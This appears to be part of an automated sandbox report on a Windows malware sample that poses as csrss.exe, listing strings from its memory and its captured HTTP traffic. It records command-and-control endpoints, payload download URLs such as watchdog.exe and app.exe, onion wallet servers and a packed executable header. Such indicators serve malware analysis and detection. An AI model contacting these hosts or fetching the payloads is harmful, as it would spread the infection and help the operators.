          Source: csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
          Source: csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 18 Oct 2021 06:02:35 GMTContent-Type: application/octet-streamContent-Length: 2102272Connection: keep-alivecontent-disposition: attachment; filename=watchdog.exeetag: "61680a87-201400"last-modified: Thu, 14 Oct 2021 10:46:31 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 125Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SIEIN%2F1XF0Uz1zUWhWjjtVKcK6yr2rylxw1%2B9wHdhNwCZmlQnik1Y11rhtQkNHt8%2F06zowdGfNcUGMzVlV7%2BzZVdUTz7EvckfqyHt3WHegA8D9QEHcXnQQxKcd0I"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 69ff8f0268394357-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M
          Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server1.trumops.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15Content-Length: 640Accept-Encoding: gzip
          Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server1.trumops.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0Content-Length: 660Accept-Encoding: gzip
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Oct 2021 06:02:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11CF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6e7jhhRmMzOf4z%2FUVKvoyuNsNr6MSHqph18xAkrV9pOs%2B%2Boq4%2BF2jzazvCMxyCBU2NQlVPEvKVhjhPqX1uOZ%2FoiylBBXdSh2%2FXzdzssuJjAhBpX72Lj2UL1Oon0%2B49gNCRBVJEbz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69ff8d5c680642ee-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Oct 2021 06:02:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=msr8acg9pq7sp3dcop8c04029e; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MgqHad%2BRL1Jwi19koLru3c3g79m4yhxIQIen93O1%2FIzAOqJAqXouucy1HssWOW9a2T8dJbYXCbBqiBBas6ee%2FLto73zfabvgBZk3r04GcxpJybUfENx4vZPL%2BJKObmAFzN6d9qUJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69ff8d80de494e32-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Oct 2021 06:03:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=c736gp74eq681lbg8qrkf25c2s; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TjJp%2FH0fSWWxfTYWA7zwRjoI7bZtPkocfoGHJ4e5RX%2F3mAoDoWRTLYBA3mWnjETR%2BBkl%2FDm6Z0fAvwUS%2BQfOW4pgeSWwqn4UzdBrsoE6VxOMsXgBWzJHovfUijYMuRV4nPXXU1Rs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69ff8f3c3c80701c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          Source: jkDmft1Qoe.exe, 00000000.00000000.657772523.00000000009FB000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678629448.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675615074.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683049395.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688553915.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696958536.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706742140.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714682148.00000000009FB000.00000008.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: jkDmft1Qoe.exe, 00000000.00000000.657772523.00000000009FB000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678629448.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675615074.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683049395.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688553915.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696958536.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706742140.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714682148.00000000009FB000.00000008.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: jkDmft1Qoe.exe, 00000000.00000000.657772523.00000000009FB000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678629448.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675615074.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683049395.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688553915.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696958536.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706742140.00000000009FB000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714682148.00000000009FB000.00000008.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
          Source: csrss.exe, 0000000A.00000003.826104445.0000000011870000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/370c4779d730135afa0e64399be9936c
          Source: csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/370c4779d730135afa0e64399be9936c%
          Source: csrss.exe, 0000000A.00000003.824034316.0000000011AEA000.00000004.00000001.sdmp, csrss.exe, 0000000A.00000003.825604620.00000000118F8000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/370c4779d730135afa0e64399be9936c/watchdog.exe
          Source: svchost.exe, 00000028.00000003.787075201.000001BD3A19A000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
          Source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpString found in binary or memory: http://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna:
          Source: csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmpString found in binary or memory: http://newscommer.com/app/app.exe
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpString found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpString found in binary or memory: https://blockchain.infoindex
          Source: svchost.exe, 00000028.00000003.787075201.000001BD3A19A000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
          Source: csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmpString found in binary or memory: https://logs.trumops.com
          Source: csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmpString found in binary or memory: https://logs.trumops.comhttps://trumops.com/api/loghttps://server1.trumops.comDistributorIDCampaignI
          Source: jkDmft1Qoe.exe, 00000000.00000002.669832232.00000000118C0000.00000004.00000001.sdmp, jkDmft1Qoe.exe, 00000004.00000002.681186282.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.701725692.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000016.00000002.704417862.00000000118DC000.00000004.00000001.sdmp, csrss.exe, 00000019.00000002.708218344.00000000118D6000.00000004.00000001.sdmp, csrss.exe, 0000001C.00000002.709002807.000000001187C000.00000004.00000001.sdmp, csrss.exe, 00000020.00000002.724004382.00000000118BA000.00000004.00000001.sdmpString found in binary or memory: https://retoti.com
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpString found in binary or memory: https://retoti.comidentifier
          Source: csrss.exe, 0000000A.00000002.931399216.000000001195E000.00000004.00000001.sdmp, csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmpString found in binary or memory: https://server1.trumops.com
          Source: csrss.exe, 0000000A.00000003.825208712.000000001198E000.00000004.00000001.sdmpString found in binary or memory: https://server1.trumops.com/api/cdn?c=1a0ceff6e935c933&uuid=8db1a514-f568-41bf-af6a-dffb7cea0346
          Source: csrss.exe, 0000000A.00000003.824386748.0000000011A72000.00000004.00000001.sdmpString found in binary or memory: https://server1.trumops.com/api/poll
          Source: csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmpString found in binary or memory: https://server1.trumops.com/api/poll40ghz
          Source: csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmpString found in binary or memory: https://server1.trumops.com/api/poll40ghzserver1.trumops.com
          Source: csrss.exe, 0000000A.00000003.824386748.0000000011A72000.00000004.00000001.sdmpString found in binary or memory: https://server1.trumops.com/api/pollserver1.trumops.com
          Source: csrss.exe, 0000000A.00000003.825208712.000000001198E000.00000004.00000001.sdmpString found in binary or memory: https://server1.trumops.com/bots/post-ia-data?uuid=8db1a514-f568-41bf-af6a-dffb7cea0346
          Source: csrss.exe, 0000000A.00000003.825189031.0000000011998000.00000004.00000001.sdmpString found in binary or memory: https://server1.trumops.comc=1a0ceff6e935c933&uuid=server1.trumops.com:443server1.trumops.com:443tcp
          Source: csrss.exe, 0000000A.00000002.930804048.00000000118AE000.00000004.00000001.sdmpString found in binary or memory: https://server1.trumops.comserver1.trumops.com:443server1.trumops.com:443tcpserver1.trumops.com
          Source: csrss.exe, 0000000A.00000003.825189031.0000000011998000.00000004.00000001.sdmpString found in binary or memory: https://server1.trumops.comserver1.trumops.com:443server1.trumops.com:443tcpserver1.trumops.comWinst
          Source: csrss.exe, 0000000A.00000002.931399216.000000001195E000.00000004.00000001.sdmpString found in binary or memory: https://server1.trumops.comserver1.trumops.com:443server1.trumops.com:443tcpserver1.trumops.comh
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpString found in binary or memory: https://sitescore.aiValue
          Source: jkDmft1Qoe.exe, 00000000.00000002.669814323.00000000118B8000.00000004.00000001.sdmp, jkDmft1Qoe.exe, 00000004.00000002.681186282.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmp, csrss.exe, 0000000A.00000002.931198604.000000001190C000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.701725692.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000016.00000002.704417862.00000000118DC000.00000004.00000001.sdmp, csrss.exe, 00000019.00000002.708218344.00000000118D6000.00000004.00000001.sdmp, csrss.exe, 0000001C.00000002.709002807.000000001187C000.00000004.00000001.sdmp, csrss.exe, 00000020.00000002.724004382.00000000118BA000.00000004.00000001.sdmpString found in binary or memory: https://trumops.com
          Source: csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmpString found in binary or memory: https://trumops.com/api/log
